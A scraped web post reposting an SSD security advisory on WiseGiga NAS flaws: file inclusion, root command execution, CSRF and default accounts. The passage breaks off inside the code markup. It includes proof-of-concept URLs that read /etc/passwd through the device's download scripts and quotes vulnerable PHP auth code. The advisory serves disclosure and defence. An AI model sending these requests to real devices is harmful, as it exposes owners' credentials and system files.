{"id":9094,"date":"2017-09-05T14:19:06","date_gmt":"2017-09-05T22:19:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/05\/news-2867\/"},"modified":"2017-09-05T14:19:06","modified_gmt":"2017-09-05T22:19:06","slug":"news-2867","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/09\/05\/news-2867\/","title":{"rendered":"SSD Advisory \u2013 WiseGiga NAS Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 05 Sep 2017 11:11:02 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3402\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3402');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities summary<\/strong><br \/> The following advisory describes five (5) vulnerabilities and default accounts \/ passwords found in WiseGiga NAS devices.<\/p>\n<p>WiseGiga is a Korean company selling NAS products.<\/p>\n<p>The vulnerabilities found in WiseGiga NAS are:<\/p>\n<ul>\n<li>Pre-Authentication Local File Inclusion (4 different vulnerabilities)<\/li>\n<li>Post-Authentication Local File Inclusion<\/li>\n<li>Remote Command Execution as root<\/li>\n<li>Remote Command Execution as root with CSRF<\/li>\n<li>Info Leak<\/li>\n<li>Default accounts<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Pierre Kim, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> We tried to contact WiseGiga since June 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.<\/p>\n<p><span id=\"more-3402\"><\/span><\/p>\n<p><u><strong>Vulnerabilities details<\/strong><\/u><\/p>\n<p><strong>Pre-Authentication Local File Inclusion<\/strong><br \/> User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).<\/p>\n<p>By sending GET request to the following URI&#8217;s with <em>filename=<\/em> as a parameter, an attacker can trigger the vulnerabilities:<\/p>\n<ul>\n<li>\/webfolder\/download_file1.php<\/li>\n<li>down_data.php<\/li>\n<li>download_file.php<\/li>\n<li>mobile\/download_file1.php<\/li>\n<\/ul>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d98056c344191284\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/IP\/webfolder\/download_file1.php?filename=\/etc\/passwd  http:\/\/IP\/down_data.php?filename=\/etc\/passwd  http:\/\/IP\/download_file.php?filename=base64(\/etc\/passwd)  http:\/\/IP\/mobile\/download_file1.php?filename=base64(\/etc\/passwd)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p><strong>Post-Authentication Local File Inclusion<\/strong><br \/> User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).<\/p>\n<p>By sending GET request to <em>\/mobile\/download_file2.php<\/em>  an attacker can trigger the vulnerability.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980579193819015\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/IP\/\/mobile\/download_file2.php?filename=base64(\/etc\/passwd)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980579193819015-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980579193819015-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/IP\/\/mobile\/download_file2.php?filename=base64(\/etc\/passwd)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p><strong>Remote Command Execution as root<\/strong><br \/> The WiseGiga NAS firmware contain <em>pre.php<\/em> files in the different directories. <\/p>\n<p>For example:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d98057f119083825\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/app_data\/apache\/htdocs\/auto\/pre.php  \/app_data\/apache\/htdocs\/admin\/iframe\/pre.php  \/app_data\/apache\/htdocs\/admin\/pre.php  \/app_data\/apache\/htdocs\/mobile\/pre.php  \/app_data\/apache\/htdocs\/wiseapp\/config\/pre.php  \/app_data\/apache\/htdocs\/pre.php  \/home\/htdocs\/webfolder\/pre.php  \/ub\/update\/init\/pre.php  \/tmp\/home\/root\/htdocs\/auto\/pre.php  \/tmp\/home\/root\/htdocs\/pre.php<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98057f119083825-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98057f119083825-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98057f119083825-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98057f119083825-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98057f119083825-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98057f119083825-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98057f119083825-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98057f119083825-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d98057f119083825-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d98057f119083825-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d98057f119083825-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">auto<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98057f119083825-2\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">iframe<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98057f119083825-3\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98057f119083825-4\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mobile<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98057f119083825-5\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">wiseapp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">config<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98057f119083825-6\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">app_data<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98057f119083825-7\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webfolder<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98057f119083825-8\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ub<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">update<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">init<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d98057f119083825-9\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">auto<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d98057f119083825-10\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">home<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">htdocs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>A &#8220;standard&#8221; pre.php contains:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980581988798820\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">     181 [&#8230;]      182 function  auth()      183 {       184  global $memberid;      185  session_start();      186 \/\/echo $memberid;      187  if($memberid==&#8221;root&#8221;)      188  {      189   \/\/ print&lt;&lt;&lt;__DATA_OF_HTML__      190   \/\/&lt;script language=&#8221;JavaScript&#8221;&gt;      191   \/\/  alert(&#8220;sucess !&#8221;);      192   \/\/&lt;\/script&gt;      193 \/\/__DATA_OF_HTML__;      194  }      195  else      196  {      197   print&lt;&lt;&lt;__DATA_OF_HTML__      198   &lt;script language=&#8221;JavaScript&#8221;&gt;      199     alert(&#8220;xc0xcexc1xf5xb9xdexc1xf6 xbexcaxc0xba xbbxe7xbfxebxc0xdaxc0xd4xb4xcfxb4xd9!&#8221;);      200 \/\/    location.href=&#8217;\/admin\/&#8217;;      201       window.open(&#8216;index.php&#8217;,&#8217;_parent&#8217;);      202     exit;      203   &lt;\/script&gt;      204 __DATA_OF_HTML__;      205  }      206      207 }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59af22d980581988798820-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980581988798820-27\">27<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-1\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">181<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-2\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">182<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">auth<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">183<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">184<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-m\">global<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">memberid<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">185<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">session_start<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">186<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/echo $memberid;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">187<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">memberid<\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-s\">&#8220;root&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">188<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">189<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/ print&lt;&lt;&lt;__DATA_OF_HTML__<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">190<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/<span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;JavaScript&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">191<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/&nbsp;&nbsp;alert(&#8220;sucess !&#8221;);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">192<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-c\">\/\/&lt;\/script&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">193<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/__DATA_OF_HTML__;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">194<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59af22d980581988798820-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">195<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59af22d980581988798820-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">196<\/span><span 